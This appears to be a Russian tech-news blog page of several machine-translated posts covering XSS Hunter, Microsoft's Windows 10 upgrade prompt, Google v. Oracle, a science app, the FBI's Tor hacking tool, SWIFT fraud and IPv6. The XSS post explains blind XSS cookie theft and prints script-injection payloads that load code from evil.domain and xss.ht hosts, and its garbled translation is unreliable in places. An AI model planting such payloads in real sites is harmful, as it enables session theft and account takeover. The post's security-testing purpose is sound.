XSS Hunter эффективная защита от XSS атак

Screen Shot 2013-01-18 at 3.40.22 PMXSS Хантер это недавно запущенная платформа, которая упрощает организацию и контроль за XSS уязвимостями. С его помощью вы можете запускать все виды атак , но там, где это действительно нужно при проведении атаки Blind XSS.

Атака Blind XSS представляет собой разновидность хранимых или постоянных атак и, как правило, влияет на веб-приложения, что позволяют пользователям хранить данные. Это происходит, когда злоумышленник использует уязвимость, которая позволяет ему сохранить свою полезную нагрузку на стороне сервера (то есть в базе данных), а затем служит с остальной частью содержания пораженной страницы, таким образом, затрагивает всех тех, кто посещает уязвимые веб-страницы.

То, что делает атаки Blind, что, хотя злоумышленник сумел сохранить полезную нагрузку он забывает, где или когда фактическое исполнение эксплоита будет происходить, поскольку есть много целевых источников, которые находятся на общем хранилище данных, обеспечивая полезную нагрузку и разгрузку через приложения или даже сетевые границы.

Администратор форума, после аутентификации, входит в систему в своей панели управления и посещает зараженную страницу, чтобы прочесть очередь комментариев, ожидающих модерации. При посещении зараженной страницы, эксплоит срабатывет, выполняет вредоносный код в своем браузере, крадет его куки-сессию, и предоставляет злоумышленнику права администратора.

Важно отметить, что такого рода атаки не требуют явного нажатия на зловредную ссылку, как это происходит в фишинговых атаках, но срабатывают при простом посещении зараженной страницы; загрузки простого  сценария < script SRC = // evil.domain /> </ script > более чем достаточно.

Это очевидно, что такую атаку с её длинной продолжительностью жизни и скрытном подходе, может быть очень трудно контролировать.

Вот где  выходит на сцену XSS Хантер, бесплатный сервис, предназначенный для использования специалистами по безопасности. XSS Hunter отправляет злоумышленнику уведомление по электронной почте, сообщив ему, что ловушка просто навернулась, и что есть более подробная информация, ожидающия оценки в его панели управления Hunter.

Поток работ четко изложены в целях платформы.

«После регистрации вы создадите специальный xss.ht короткий домен, такой как yoursubdomain.xss.ht, который идентифицирует вашу уязвимость XSS и принимает вашу полезную нагрузку. Затем вы можете использовать этот поддомен в тестировании XSS, используя попытки инъекций, такие как»> < script SRC = // yoursubdomain.xss.ht> </ script >. XSS Hunter будет автоматически обслуживать XSS зонды и собирать полученную информацию, когда они сработают «.

Например, мы раздобыли пользовательского домена https://test1.xss.ht

который теперь может быть использован в полезных нагрузках, таких как:

‘> < script SRC = https: //test1.xss.ht> </ script >’

После доступа к панели, мы получаем экран, который содержит журнал всех событий атак и связанных с ними данных, захваченных из машины жертвы. Эти данные включают IP жертвы, полную страницу, скриншоты содержимого страницы, вызвавшею событие, и отчеты, содержащие различные другие детали.

 

Рубрика: Безопасность | Комментарии к записи XSS Hunter эффективная защита от XSS атак отключены

Microsoft по-своему интерпретировала кнопку «закрыть» в уведомлении Windows 10

zQ0xyGGKИнтерпретация от Microsoft кнопки «Закрыть» в уведомлении о предстоящем обновлении до Windows 10 противоречит рекомендациям компании по разработке, согласно документам, на веб-сайте фирмы.

В рамках заключительного толчка, чтобы увеличить количество компьютеров, работающих под управлением Windows 10 до истечения срока его бесплатного предложения обновления (29 июля), Microsoft изменила поведение диалогового окна уведомлений, так что при нажатии на «X» в верхнем правом углу разрешается предварительно запланированное обновление.

Мало того, что в отличие от десятилетий конвенций и пользовательских ожиданий, это изменение от прошлого поведения диалога. Раньше, когда пользователи увидели кадры диалога, создаваемые с помощью Получить Windows 10 (GWX) приложение — которое отвечает за производство уведомлений — они могли выйти из диалогового окна и отменить предлагаемое действие, нажав на X, чтобы закрыть окно.

Microsoft первые скачали и установили GWX на миллионах Windows 7 и 8.1 машин в прошлом году, первоначально как способ для клиентов «резервного» бесплатного обновления до 10, и неоднократно передел и заново установил его на ПК с тех пор. В течение нескольких месяцев, Microsoft делала её GWX и Windows 10 стратегию обновления все более агрессивной, включая автоматическую загрузку необходимых битов в наиболее подходящиеПК, а затем расширение, что молча планировало процесс обновления.

Тем не менее, весной этого года Microsoft решила пересмотреть Х щелчок, как утверждение обновления. «Если вы нажмете на кнопку ОК или на красный ‘X’ вы выберете весь набор обновления и дальше делать ничего не нужно заявил документ поддержки Microsoft по авто-планированию обновления до Windows 10.

Хотя некоторые утверждают, что клик на X должен был рассматриваться, как кнопка «Закрыть», а не кнопка «Выход» – раньше отключал диалог, в то время как последний отменяет процесс рассмотрения — и подразумевать, что Microsoft не нарушает свои собственные рекомендации по конструкции, это не правильно.

По крайней мере, не по собственной документации Microsoft.

«Кнопка Закрыть в строке заголовка должна иметь тот же эффект, как Отмена или кнопка Закрыть в диалоговом окне» указано рекомендациям фирмы по разработке диалоговых окон. «Никогда не делайте такой же эффект, как OK».

Эти рекомендации были написаны для Windows 7, остаются на прицеле разработчиков сайта Microsoft и, насколько удалось определить, не были заменены различными советами для последующих выпусков ОС.

В другом месте в том же документе, Microsoft рассказала о сторонних разработчиков, «Используйте Отмена или Закрыть для отрицательных фиксаций кнопки вместо конкретных ответов на основной инструкции.»

Это именно то, как пользователи относились к X в диалоговом окне планирования обновления, как «отрицательное действие» или на простом русском языке, как «Нет, спасибо.» Microsoft, с другой стороны, интерпретировало его, как полную противоположность.

Другие примеры из того же набора принципов показывают, что Microsoft нарушили свои собственные правила. «Убедитесь, что кнопка Закрыть в строке заголовка имеет тот же эффект, как Отменить или Закрыть», говорится в документе.

 

Рубрика: Корпорации и компании, Статьи | Комментарии к записи Microsoft по-своему интерпретировала кнопку «закрыть» в уведомлении Windows 10 отключены

Суд оправдал Google в деле против Oracle

maxresdefault (2)Жюри в Сан-Франциско в четверг оправдали Google в нарушении авторских прав в деле, возбужденном Oracle над использованием Google Java в Android.

Жюри, состоящему из восьми женщин и двух мужчин понадобилось три дня обсуждения, чтобы достичь своего вердикта. Oracle стремился до $ 9 млрд в качестве возмещения ущерба, что делает эту победу огромной для Google и его юридической команды.

«Ваша работа сделана,» сказал присяжным судья Уильям Алсап после оглашения приговора.

Юристы Oracle сидели, опустив головы, после того, как приговор был зачитан, но вскоре после этого компания заявила, что продолжит борьбу.

«Мы считаем, что есть многочисленные основания для подачи апелляции, и мы планируем вывести это дело обратно в Федеральный округ по апелляции», сказал генеральный советник Oracle Дориан Дейли в письменном заявлении, ссылаясь на апелляционный суд США в Вашингтоне, округ Колумбия

Реакция юридической команды Google также был приглушена на первый взгляд, хотя они стояли, улыбаясь и обнялись после того, как присяжных вывели из комнаты.

«Мы благодарны за вердикт присяжных,» позже сказал ведущий адвокат Google Роберт Ван Нест.

Судья Алсап сказал, что он хотел бы поблагодарить членов жюри лично в комнате присяжных. Они объявили, что они достигли своего приговора за несколько минут, прежде чем они должны были огласить его в течение дня. Предыдущее присяжные не смогли достичь соглашения о справедливости вопроса, и есть шанс, что присяжные могут сделать то же самое.

Вопрос заключался в решении компании Google копирования 37 интерфейсов прикладного программирования Java, в том числе тысячи строк кода и «объявить» свою операционную систему Android.

Поскольку судебный процесс начался 10 мая, жюри заслушал показания парада воротил Кремниевой долины, включая представителей компании Google Эрика Шмидта и Ларри Пейджа, генерального директора Oracle Сафра Кац, и бывшего генерального директора Sun Microsystems Джонатана Шварц.

Сообщение от Google жюри заключалось в том, что Sun предназначало Java быть свободным для любого использования, поэтому они сделали язык Java с открытым исходным кодом, в первую очередь. Он сослался на запись в блоге Шварца, поздравляя Google с выпуском Android, как доказательство того, что у Sun не было никаких проблем с использованием Google Java.

Юристы Oracle, нарисовали совсем другую картину. Google был в отчаянии, чтобы доставить его мобильную операционную систему на рынок быстро, и после неудачной попытки обеспечить лицензионное соглашение с Sun, Google пошел вперед и использовал Java в любом случае.

«Они знали, что они нарушают правила, они знали, что они принимают ярлыки, и они знали, что это было неправильно», сказал присяжным в своем заключительном заявлении Питер Бикс, адвокат Oracle.

Но жюри не приняло к сведению аргумент Oracle.

Результатом является маленькая победа для разработчиков программного обеспечения, которые были встревожены ранее принятым решением в том случае, если интерфейсы прикладного программирования могут быть защищены в соответствии с США об авторском праве.

 

 

Рубрика: Корпорации и компании | Комментарии к записи Суд оправдал Google в деле против Oracle отключены

Android лаборатория Science Journal

Нам нужно найти хорошие способы для молодых людей, чтобы начать работу с реальной наукой и данными. Google выпустила Android приложение, которое только могло бы помочь.

Science Journal звучит как то, что вы могли бы прочитать, но в данном контексте это своего рода журнал, в который вы записываете результаты. Это Android-приложение, которое позволяет использовать пользователя в научных проектах без необходимости в лаборатории. Или иначе говоря, Science Journal и есть ваша Android лаборатория.

Поэтому нам не нужно дешевые компьютеры как на Raspberry Pi или micro:bit, когда мы почти все имеем очень способные компьютеры вокруг с нами в форме наших смартфонов.

Если у вас возникла идея использования даже дешевого смартфона для научного эксперимента будильников — то вам необходимо учесть тот факт, что почти все они имеют набор сенсоров, что означает, что вы не должны открывать дело и добавлять вещи, чтобы они были полезными. Типичный смартфон имеет датчик освещенности, который используется для регулировки яркости экрана, микрофон и акселерометр. Новое приложение предоставляет программное обеспечение, чтобы использовать эти датчики для разработки своих собственных проектов.

Существует также спутниковый веб-сайт, который предполагает, что вы могли бы сделать. Например, выяснить, как яркость изменяется в зависимости от угла. Датчик звука может дать вам уровень звука, но, к сожалению, не делает более продвинутые вещи, как, например, вычисления спектра звука.

Возможно, датчиком с наибольшим количеством возможностей является акселерометр. Вы можете использовать эту функцию для записи любого или всех ускорений в х, у и Z плоскости. Это также, где это становится опасно для телефона:

Положите телефон на плоскую поверхность, например, стол и барабаньте или трясите его. Бросьте телефон, с безопасного расстояния, в руку или во что-то мягкое. Поместите телефон внутрь длинного носка и повертите его вокруг головы. Какой режим работы акселерометра лучше всего подходит для записи ваших движений?

Будьте осторожны крутя телефон вокруг своей головы, ведь точно невозможно спрогнозировать стоимость его ремонта.

В конце концов вы могли бы подумать, что вся эта идея очень ограничена, но это еще не все. Google добавила идею подключения микрокомпьютеров, которые поддерживают Bluetooth, чтобы добавить датчики. Существует эскиз Arduino, например, который доступен на GitHub, который использует датчик освещенности для подсчета оборотов ветряного ротора. После этого вы можете экспериментировать, чтобы выяснить, что делает хороший воздушный ротор.

Добавление Arduino к соединению открывает огромные горизонты. После того как вы подключили один Bluetooth датчик, почему бы не подключить больше? Вот где настоящая наука может происходить. Например, вы можете иметь точный датчик температуры или рН-метр. Конечно, вы могли бы все это с как раз Arduino или Raspberry Pi, но взаимодействие их с приложениями, работающими на операционной системе Android, позволяет проводить эксперименты проще и веселее.

Рубрика: Education | Комментарии к записи Android лаборатория Science Journal отключены

ФБР отказалось открыть исходный код своих инструментов

Секретный инструмент взлома ФБР, который использовался для компрометации анонимного браузера Tor в одном исследовании, сталкивается с проблемами из обвиняемых по уголовным делам, возможно, поставив свое будущее под вопрос.

Подсудимые потребовали предоставить детали следственной сетевой техники ФБР (NIT) и имя агентства относительно недавнего хакерского инструмента, используемого в нескольких уголовных делах, но агентство отказалось раскрывать информацию.

Судья в этом нашумевшем случае, в котором веб-сайт был доступен только через Tor, пытается решить, следует ли ФБР раскрывать исходный код ответчика.

Если исходный код ФБР и его хакерские инструменты могут быть скомпрометированы, то Шестая поправка к Конституции США дает ответчику право противостоять обвинителям и начать расследование.

Судья Роберт Брайан из окружного суда Западного округа штата Вашингтон пытался решить конкурирующие интересы в процессуальном порядке.

Просьба ответчика по предоставлению исходного кода «ставит этот вопрос в необычное положение,» пишет Брайан. «Что должно быть сделано в этом случае, когда, в соответствии с этими фактами, защита имеет обоснованную потребность в информации в руках правительства, но правительство имеет неоправданное право включить информацию в оборону?»

Ars Technica, в котором сообщается о порядке Брайана на этой неделе, отметил, что два других судьи, в штате Оклахома и Массачусетс в этом году опровергли полученные от NIT доказательства. И адвокат в Западной Вирджинии подал ходатайство о отзыве заявления о признании вины по делу NIT доказательств.

Стратегия ФБР с автоматизированными исследованиями NIT, как представляется, связана с сокрытием её использованием хакерских утилит, а также, в некоторых случаях.

Способность обвиняемых противостоять уликам против них «абсолютно необходима» для проведения справедливого судебного разбирательства, сказал Уэсслер. Секретные доказательства «непримиримых» с системой правосудия США, добавил он.

ФБР защищал NIT, говоря, что их использование ограничено. «Использование NIT является законным и эффективным, и применяется только в случае необходимости — в отношении некоторых из худших преступников», сообщает агентство в своем заявлении.

Случай Мишо поднимает несколько липких вопросов о технологии и сказал об этом экспертам по правовым вопросам.

Обе стороны должны иметь доступ к доказательствам по уголовному делу, но если ФБР раскроет исходный код, то это может убить эффективность инструмента и не позволит ему продолжать работу, говорит Пол Флетчер, специалист безопасности для поставщиков охранного оповещения Logic.

«Обмен подробной информацией в этом случае не обязательно означает, что информация должна быть выпущена для общественности,» сказал он по электронной почте. «Последствия, которые влечет за собой это действие означает, что ФБР было бы вынуждено раскрыть свой технический потенциал и / или их зависимость от внешних источников, т.е. хакерской техники. Другими словами, широкая публика начинала понимать уровень технических возможностей ФБР «.

 

 

Рубрика: Безопасность | Комментарии к записи ФБР отказалось открыть исходный код своих инструментов отключены

SWIFT просит клиентов помочь ей в обеспечении своей кибер-безопасности

Финансовая операционная сеть swift02121 призвала своих клиентов пятницу, чтобы помочь ей закончить серию громких банковских махинаций, совершенных с использованием своей сети.

Сама сеть SWIFT по-прежнему безопасна, как настаивают её представители в письме к банкам и финансовым учреждениям. Тем не менее, некоторые из её клиентов пострадали от нарушения правил безопасности в своей собственной инфраструктуре, позволяя злоумышленникам обманным путем провести операции авторизации и отправить данные по сети SWIFT, сказали они.

Это лучшее объяснение до сих пор для того, как аутентифицированные инструкции были отправлены из Банка Бангладеш в Федеральный резервный банк Нью-Йорка по сети SWIFT, заказывая передачу почти $ 1 млрд. ФРБ передал около $ 101 млн до выявления аномалии в одной из инструкций. Только $ 20 млн до сих пор были восстановлены.

«В то время как клиенты несут ответственность за безопасность своей собственной среды, безопасность является нашим главным приоритетом, и как отрасль в кооперативной собственности, мы стремимся помочь нашим клиентам бороться против кибер-атак,» сказал SWIFT в письме.

SWIFT желает, чтобы её клиенты выступили с информацией о других мошеннических переводах, сделанных с использованием их учетных данных SWIFT, чтобы помочь им построить картину того, как работают злоумышленники.

Она вежливо напомнила своим клиентам, что они обязаны предоставлять такую ​​информацию в соответствии с условиями их контракта, а также помогать SWIFT идентифицировать, расследовать и разрешать проблемы, в том числе путем предоставления диагностической информации после инцидента.

В SWIFT обещали своим клиентам обмениваться новой информацией о вредоносных программах или другими показателями взломанных систем. Они сказали, что хотели бы добавить такую ​​информацию на свой веб-сайт под названием «Порядок работы, связанный с нарушениями в среде клиента.»

«Будут размещены вся новая и соответствующая информация, связанная с киберинцидентами в учреждениях клиентов, известных нам,» сказал SWIFT в своем письме в пятницу. Но клиентам не мешало бы искать в другом месте, тоже, так как компания разбросала недавнюю информацию о базе знаний.

Совет 5020930, например, объясняет, как узнать, была ли система была скомпрометирована вредоносной программой, которая предотвращает хранение транзакций подтверждений приема в местоположении на диске по умолчанию.

Записи базы знаний показывают, что SWIFT обновила свое ПО Alliance Access  несколько раз за последние несколько месяцев. Один из советов предупреждает, что сохранять программное обеспечение в актуальном состоянии является важным пунктом, но оно не является достаточным само по себе. «В то время как обновление программного обеспечения обеспечивает дополнительную проверку целостности, это не поможет вам защититься от всех вредоносных программ, или кражи ваших внутренних учетных данных » SWIFT писал в другом недавнем письме к клиентам , озаглавленном «вопросы безопасности».

СВИФТ также предлагает более общие рекомендации по безопасности для своих клиентов и говорит, что он намерен обновить их в ближайшее время.

 

Рубрика: Безопасность, Корпорации и компании | Комментарии к записи SWIFT просит клиентов помочь ей в обеспечении своей кибер-безопасности отключены

IPv6 — основное условие для Интернета вещей

Ipv6Вы думаете, что Интернет вещей (IoT) будет следующей большой вещью? Не будет. До тех пор, пока мы не закончим IPv6.

Без обширного глобального принятия и успешного развертывания IPv6 в качестве основной версии интернет-протокола, IoT будет невозможен. На самом деле, будущее самого Интернета поставлено на карту. Вот пять причин, почему:

  1. IoT потребуется больше IP-адресов, чем IPv4 может обеспечить.

По оценкам компании Gartner, к 2020 году будет более 26 миллиардов устройств IoT, подключенных к Интернету. Cisco думает еще больше; он прогнозирует, что будет более 50 миллиардов устройств, подключенных к сети Интернет к 2020 году.

К сожалению, IPv4 по-прежнему широко используется, и IPv4 имеет только 4,3 миллиарда возможных IP-адресов. Теперь, это правда, не каждому устройствц IoT потребуется IP-адрес, но IPv4 может вместить менее 20% устройств, что проекты Gartner спрогнозировали всего лишь за четыре года с этого момента. Хуже того, большинство адресов IPv4 уже истощены, с одним небольшим исключением во всем мире находятся в Африке. И распределение даже Африки, по прогнозам, будут исчерпаны к 31 марта 2018 года.

  1. Облачные вычисления также нуждается в большем количестве IP-адресов, чем IPv4 может обеспечить.

Когда Microsoft решила использовать IPv4 для центров обработки данных, которые будут поддерживать свою инициативу облачных вычислений, она должна была искать по всему миру после того, как крайне ограниченное количество IPv4-адресов было доступно, и заплатить очень высокую цену за них.

Поставки на подержанном рынке IPv4 становятся тонкими, поэтому цена для IPv4-адресов будет подниматься еще выше — по некоторым оценкам, до $ 100 за адреса IPv4 в ближайшем будущем. Угадайте, кто будет в конечном итоге платить за такие адреса втридорога. Клиенты, конечно.

  1. Принятие политики «только IPv6» может значительно снизить угрозы кибербезопасности.

Это просто: В тот момент, когда мы выключим IPv4, мы устраним глобальные кибератаки и угрозы безопасности на базе стека протоколов IPv4. Может быть, что мы проиграли сражение против хакеров в стеке IPv4. Но, мы можем все еще есть шанс выиграть войну в стеке IPv6. Это может быть наш лучший шанс одержать верх.

  1. IPv4 является лишь бета-версией Internet.

Согласно Vint Cerf, одного из отцов интернета и соизобретателя набора протоколов TCP / IP, IPv4 это только «экспериментальная версия Интернета.» Но мы использовали эту бета-версию своего интернет-протокола с 1983 года . Как указано Cerf, IPv6 является фактической производственной версией Интернета для 21-го века.

Почему мы использовали бета-версию в нашей производственной среде так долго?

  1. Принятие IPv6 является вопросом лидерства, видения и конкурентных преимуществ.

Поставщики услуг и производители продуктов продолжают говорить, что нет спроса на IPv6 со стороны своих клиентов. Но это нонсенс, чтобы ждать их. Большинство потребителей не знают, какая версия IP работает в их электронных устройствах, и их это не колышет.

Что действительно важно, видит ли руководство компании, что она может сохранить конкурентное преимущество для своих продуктов и услуг и может процветать в новую эру быстрых технологических инноваций, основанных на IPv6.

Рубрика: Новости Интернета | Комментарии к записи IPv6 — основное условие для Интернета вещей отключены